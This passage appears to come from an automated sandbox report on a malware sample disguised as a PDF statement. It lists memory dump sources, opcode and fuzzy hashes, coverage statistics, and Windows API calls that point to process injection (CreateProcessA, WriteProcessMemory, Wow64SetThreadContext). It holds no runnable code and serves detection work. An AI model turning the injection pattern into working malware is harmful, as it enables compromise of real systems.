                                  • Opcode Fuzzy Hash: a1ee4d32c0018c26aea2074952cfcd374494692063fff1887cbc240a0140ea68
                                  • Instruction Fuzzy Hash: 93019E31B200259BDFA49E78D8146EBB3FAEFC8300F14453AD40AE7358EE24D9458BD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9dcce3bf50bb95e2294c0aa061eb47557d95fee6c285ec5a3b850a8f334f663e
                                  • Instruction ID: e34623222e3bdcc5ad2a91d93be8f46c85c000afe85aeb96b077e1186f27235d
                                  • Opcode Fuzzy Hash: 9dcce3bf50bb95e2294c0aa061eb47557d95fee6c285ec5a3b850a8f334f663e
                                  • Instruction Fuzzy Hash: 6B21A2B5D01619AFCB00DF9AD984ADEFBB4FF49310F10852AE518B7740C378A554CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9846c2b88d8cb2cf006d0be2d964b7e280a9b790e3c898174b648a57d0dc075b
                                  • Instruction ID: 64567b872721a51cad73e722f5de3fe9ddc422373aea59b1e6de4eee7ae9be2f
                                  • Opcode Fuzzy Hash: 9846c2b88d8cb2cf006d0be2d964b7e280a9b790e3c898174b648a57d0dc075b
                                  • Instruction Fuzzy Hash: 66012675B001118FCB669A7CDC547AE67EACBC9620F188C2AF10AC7366DE38CC434384
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                  • Instruction ID: 0cce8e73b35542fd2fba63b2eb54740b859d5543be415efa2b117d2997ebb417
                                  • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                  • Instruction Fuzzy Hash: EE11BF76504684CFDB12CF14D5C8B16FF61FB84324F24C6AAD84A5B656C33AD90ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 0974eb103fe28dc230f9b441134cfcfa8915d3d850ea37abc2353a9f97b76a06
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: E8119D75504280DFDB06CF14D5C8B15BFA2FB84314F24C6AAD84A4B656C33AE94ACFA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e966cbc46685ade6b0f81b41226d4b59c1e262ea0d8b7a3af615b4b97e047025
                                  • Instruction ID: fe2360da0743f30b2f7e02afbf077a142a1eac1ae3741c29b4f5c6c5dcfbeb74
                                  • Opcode Fuzzy Hash: e966cbc46685ade6b0f81b41226d4b59c1e262ea0d8b7a3af615b4b97e047025
                                  • Instruction Fuzzy Hash: 8E01D430B001509FDBA5AAB8E9517AE6BE5EB85710F14983AE00ACB354EF25DC428380
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f93f6d5747029061993b525d10a988ea232753d69a60d649f64ef519712acf51
                                  • Instruction ID: 36b47a891917dadfb071e7f43a36ec4b90f64a3b02ed25e16ae780a4f8e39404
                                  • Opcode Fuzzy Hash: f93f6d5747029061993b525d10a988ea232753d69a60d649f64ef519712acf51
                                  • Instruction Fuzzy Hash: 2211A2B5D01259AFCB00DF9AD984ADEFBB4FB49310F50812AE518B7340C374A554CBE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3279011563.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_c9d000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                  • Instruction ID: 5892f95f6c93f26df0693b5c8b906e56df543bb9a1c5eafb22e04cfa4cd42965
                                  • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                  • Instruction Fuzzy Hash: CA11D076504280CFCB01CF14D5C4B19BF62FB44324F24C6ADD84A4B662C33AD85ACB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d0b2877e86af04fec3eec217ee455cc740a620b562230adcb85486a993cf3a1
                                  • Instruction ID: 9084ce187e70b88cc125330db9556dafb2b52895b32299a3d347b73a922f392d
                                  • Opcode Fuzzy Hash: 6d0b2877e86af04fec3eec217ee455cc740a620b562230adcb85486a993cf3a1
                                  • Instruction Fuzzy Hash: 7F01AD35B100209BDB6595ADE855BABA6DACBC9720F20843AE60EC7349EE75DC428390
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3df2a951ad6e049f33764d9f973e366e1b64b78e1f7213038b5c34f7d786d956
                                  • Instruction ID: 5801bafca5db48492cc40c704ae494494a8c2c40be6bd9a1204cc4e6d8f2948d
                                  • Opcode Fuzzy Hash: 3df2a951ad6e049f33764d9f973e366e1b64b78e1f7213038b5c34f7d786d956
                                  • Instruction Fuzzy Hash: 3D01DC75B100118BCBA99A2DEC50BAEA7EADBC9620F148839F10AC7360EE65DC424384
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77585e0ed8fd9f65de77aea00887db7a0318677abc9cd5691120554f1671a64c
                                  • Instruction ID: 2f33aa675e195f923e4c6d425f4215cb1d3d0ba1243ea5fd197f3d97a8f1b07c
                                  • Opcode Fuzzy Hash: 77585e0ed8fd9f65de77aea00887db7a0318677abc9cd5691120554f1671a64c
                                  • Instruction Fuzzy Hash: 43018130B105149BCB64EABCE954BAE77DADB89710F109438F10AC7354EF26EC428784
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b15d025389c1ae80b873ee8ddc66a75d05d8bc08a4075b4457d4f7a840244900
                                  • Instruction ID: a58623c368b0ce5abf2607bb491bdbd525b98f372525b64b61aef92fed6812cd
                                  • Opcode Fuzzy Hash: b15d025389c1ae80b873ee8ddc66a75d05d8bc08a4075b4457d4f7a840244900
                                  • Instruction Fuzzy Hash: 9E017631E10224EBDB14AA74F840ADEB729FB85310F00447AE505EB345EB35AA448BC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 972067a1f2884c94dfe9d0dd04b217a4fa8a11b897bda51c974f44177db3afaf
                                  • Instruction ID: 379e9e513e7cb69a56d0a3641e6712dbe0bedb62b02391e6b7bda68ca5c0feb4
                                  • Opcode Fuzzy Hash: 972067a1f2884c94dfe9d0dd04b217a4fa8a11b897bda51c974f44177db3afaf
                                  • Instruction Fuzzy Hash: CE01F431F20228DBDB14AA69E840ADEB779FB85314F004439E905E7345DB71A9418BC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe02d9de06b4c1976c1229c6b55c4a70ebe7ef70b450b28b40f01b86362b3117
                                  • Instruction ID: e214826630c0e50beb7830fea1b4f561b96bd874a5ead385945f1b1962bb5719
                                  • Opcode Fuzzy Hash: fe02d9de06b4c1976c1229c6b55c4a70ebe7ef70b450b28b40f01b86362b3117
                                  • Instruction Fuzzy Hash: 5FF03075E10718EF8B34CFA9D84049ABBF9EF8D610B00856AE455D3710D731E958CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 92d0c9a131f4565255b2fc66ca42e8914f0b0b001e965c01e82abfa3d7b80039
                                  • Instruction ID: 143cf1856b8eb00fff4fa2e639874a8fbcbe2dad29453c3c8d299014bfe74d1c
                                  • Opcode Fuzzy Hash: 92d0c9a131f4565255b2fc66ca42e8914f0b0b001e965c01e82abfa3d7b80039
                                  • Instruction Fuzzy Hash: 3CE0D871D1D5889BDF50CBB4DBA13E93B749B42118F2099E6C448DB302D17ACB41C350
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 352d4e2008c92ae84fde51fe48398ca9d3f89834aea1d97f1a769fb66f901f7c
                                  • Instruction ID: a9cf0b319e00d0271c63ebc251f60981ad8ccbda15bea7edee962be75b936571
                                  • Opcode Fuzzy Hash: 352d4e2008c92ae84fde51fe48398ca9d3f89834aea1d97f1a769fb66f901f7c
                                  • Instruction Fuzzy Hash: 67E0C2B1E11108EBDF50CEB4C9557AA77BCD701204F20D8A4D408C7301E172CA818380
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3810553869
                                  • Opcode ID: c3611a36eb1af4d0d387f371d8eb65b69af45d79dcea254e83ae72327bf36c83
                                  • Instruction ID: 97bba64acaabb476e11f3743ab00dd9cf6b3dfda4f9591c1929cde739b94377e
                                  • Opcode Fuzzy Hash: c3611a36eb1af4d0d387f371d8eb65b69af45d79dcea254e83ae72327bf36c83
                                  • Instruction Fuzzy Hash: 78122B30E01219CFDB64DF65C994A9EBBB6FF88300F2095A9D409AB365DB349D85CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: c0f10606ecaa5f7329c03444935480a9348dde47c3c20fc969052a304886c13f
                                  • Instruction ID: 9b4bbec75e7ec768a4bada9d02c89958c80f54a9ad8bbe085c1b525f7e3f1fca
                                  • Opcode Fuzzy Hash: c0f10606ecaa5f7329c03444935480a9348dde47c3c20fc969052a304886c13f
                                  • Instruction Fuzzy Hash: 46917F30A10209DFDB64EFA4DA54BEEBBB6FF44300F209529E405A7395DB749C85CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 5149f042f37526f51367f442bfa4e02631b9c13042055851e72b05b75d6324fa
                                  • Instruction ID: 41e312f47b386122018007e970b87ba2fba2ab5ef14f3604627c15eb3e0a0a5e
                                  • Opcode Fuzzy Hash: 5149f042f37526f51367f442bfa4e02631b9c13042055851e72b05b75d6324fa
                                  • Instruction Fuzzy Hash: B2F14E30A00208CFDB54EB65D954AAEBBB7BFC4300F248469D4059B3A9DF35ED86DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: a32dd9a04ee069219ad62e17d51732234a01127664cce4ff1eb8755d36e03822
                                  • Instruction ID: f91cbda609655d6611945972c21af0b59d3e9860e605fded5aa261653cc600ab
                                  • Opcode Fuzzy Hash: a32dd9a04ee069219ad62e17d51732234a01127664cce4ff1eb8755d36e03822
                                  • Instruction Fuzzy Hash: 68B14A30A00218CFDB54EF65C994AAEB7BAFF84314F24946DD4069B396DB74DC86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq$LRjq$$jq$$jq
                                  • API String ID: 0-2974078839
                                  • Opcode ID: 4cf93e6a65d81d9952bd5b47856d5bf519c0ca90d3998b20fb6c16c6524b7b85
                                  • Instruction ID: 6b91a551f7dc7cce06f1c4f607dc099c28b65e6489a27e63330f771d1d5400ec
                                  • Opcode Fuzzy Hash: 4cf93e6a65d81d9952bd5b47856d5bf519c0ca90d3998b20fb6c16c6524b7b85
                                  • Instruction Fuzzy Hash: 6F51A330B00201DFDB54EF28D954AAEB7AAFF85704F14956DE4059B3A9DB31EC85CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: da36455648f198a4b6d9f4e8122fc2f6dde778f31608c43d614055b8e92e2ef1
                                  • Instruction ID: b824ca7fbeff56b77a0f84e83a1bb316e8e5217c14a2e477d5c0e605eb1a698f
                                  • Opcode Fuzzy Hash: da36455648f198a4b6d9f4e8122fc2f6dde778f31608c43d614055b8e92e2ef1
                                  • Instruction Fuzzy Hash: 9B519E30E10204CFDBA5DBA4E984AEDB7B6FF85310F14956AE805A7355DB34EC82DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:8.6%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:171
                                  Total number of Limit Nodes:11

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 009FD876
                                  • GetCurrentThread.KERNEL32 ref: 009FD8B3
                                  • GetCurrentProcess.KERNEL32 ref: 009FD8F0
                                  • GetCurrentThreadId.KERNEL32 ref: 009FD949
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: eacd7f0ea01707dbc08b3b15bf2fa8623ac724c01fbd7d6c33b8efa7d1b9833f
                                  • Instruction ID: 9438f1499a059b2e1b60b8d2d7a82cf8d48e5813c00521ed4bbef49aa929fee6
                                  • Opcode Fuzzy Hash: eacd7f0ea01707dbc08b3b15bf2fa8623ac724c01fbd7d6c33b8efa7d1b9833f
                                  • Instruction Fuzzy Hash: FD5167B0D013098FDB54DFA9D548BAEBBF6FF88314F208459E109A7360D7749984CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502D4E6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 28b93140af4230aa21f3888dbc28fa8622b860c23445dc4c351ba4fb212aff26
                                  • Instruction ID: e235f048bdc0aaec4d1ad167a86bf6d62d182e56edfa78fecd5e42a5e16e6d27
                                  • Opcode Fuzzy Hash: 28b93140af4230aa21f3888dbc28fa8622b860c23445dc4c351ba4fb212aff26
                                  • Instruction Fuzzy Hash: E9A17F71D00629DFDB20DFA8D845BEDBBF2BF48314F14816AD809A7290DB749986CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502D4E6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 54a8a4c46cf80edbe67357b307274e08492207895af057c52a7272e637dada3d
                                  • Instruction ID: c7d50a1e5d1a8bc928b2301ba33452ad51a35c8043fb17a51fd2474cb5a20b54
                                  • Opcode Fuzzy Hash: 54a8a4c46cf80edbe67357b307274e08492207895af057c52a7272e637dada3d
                                  • Instruction Fuzzy Hash: 60915D71D00629DFDB20DFA8D845BEDBBF2BF48314F14816AD809A7290DB749986CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 009FB7C6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 83d728ae79f2ef8caa57ede6695cfe1aabe8cf0226c93fe244c0025eae31ba4f
                                  • Instruction ID: 1c911ede7d46075806eddbd016ab424556c4ea8baa24794c15395c41b6218ef5
                                  • Opcode Fuzzy Hash: 83d728ae79f2ef8caa57ede6695cfe1aabe8cf0226c93fe244c0025eae31ba4f
                                  • Instruction Fuzzy Hash: 338169B0A00B488FDB24DF29D4447AABBF5FF88310F10892DD18AD7A50D774E94ACB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009F59C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 7857efd9e6024c8065b7e97eef178a29431f84008d3b902d4eb6420c6de1ea55
                                  • Instruction ID: 599d059cc0269924bc9bed4c9fc6d78666fcec075b4b6e5a9090c5ec9d72a531
                                  • Opcode Fuzzy Hash: 7857efd9e6024c8065b7e97eef178a29431f84008d3b902d4eb6420c6de1ea55
                                  • Instruction Fuzzy Hash: 8741FFB0C00619CBDB24CFA9C884BDEBBB5BF88304F21816AD109AB251DB765946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009F59C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2128097545.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_9f0000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: a808cc5d8ca91d4cb21a8a52a871a9dcd6a80eef8748c05f06f4cef287a332f5
                                  • Instruction ID: 2a52a759e9757de5acaaca28837bc6aeb7923ff45f02d3c33ed3de9968afb26f
                                  • Opcode Fuzzy Hash: a808cc5d8ca91d4cb21a8a52a871a9dcd6a80eef8748c05f06f4cef287a332f5
                                  • Instruction Fuzzy Hash: 1F4103B0C0071DCBDB24CFA9C884B9EBBF5BF48304F21806AD619AB255DBB56945CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0502D0B8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: ad8812362c661a081ff110f4e482a1ed4feaec54f2f6d9491bc913467f04ecaf
                                  • Instruction ID: c4299901f45b8d1b972f9a086c06efb31f2aec870e96970153aee331edfa7829
                                  • Opcode Fuzzy Hash: ad8812362c661a081ff110f4e482a1ed4feaec54f2f6d9491bc913467f04ecaf
                                  • Instruction Fuzzy Hash: E22146B19003599FCB10CFAAD884BEEBBF1FF48310F50842AE959A7250C7789945CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0502D0B8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 09b4b416758b856caaed5e16470a727d33b2a0d9b70fb8b2c2ed7cf908c8023b
                                  • Instruction ID: d7cc536d0db53f28521d2a7b36bd399c1b4755669392d1bb3bce8da9fa17b489
                                  • Opcode Fuzzy Hash: 09b4b416758b856caaed5e16470a727d33b2a0d9b70fb8b2c2ed7cf908c8023b
                                  • Instruction Fuzzy Hash: F32169B19003199FCB10CFAAC884BEEBBF5FF48310F50842AE919A7250C7789941CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0502CF0E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 61f45f8d1419e8246e51a33f3bf7505513885eddd1e2453336155e76c9d3f2ab
                                  • Instruction ID: fe8fc4508c8db510f37b936ea1aafdd8ec1d3b7b956d7c98b1a619ce6952061b
                                  • Opcode Fuzzy Hash: 61f45f8d1419e8246e51a33f3bf7505513885eddd1e2453336155e76c9d3f2ab
                                  • Instruction Fuzzy Hash: E02125B19042099FDB60DFAAC485BEEBBF4FF48324F14842AD459A7240C7789945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502D198
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2135662465.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_5020000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 512c8b179835c7537c141dd3b0ece84d1b0b0c826473f1a75cb36ea764238321
                                  • Instruction ID: 8f89dc918a2cbb3905495ee1231a72ea5f25951ce8f48a12a7c00f215edb8c03
                                  • Opcode Fuzzy Hash: 512c8b179835c7537c141dd3b0ece84d1b0b0c826473f1a75cb36ea764238321
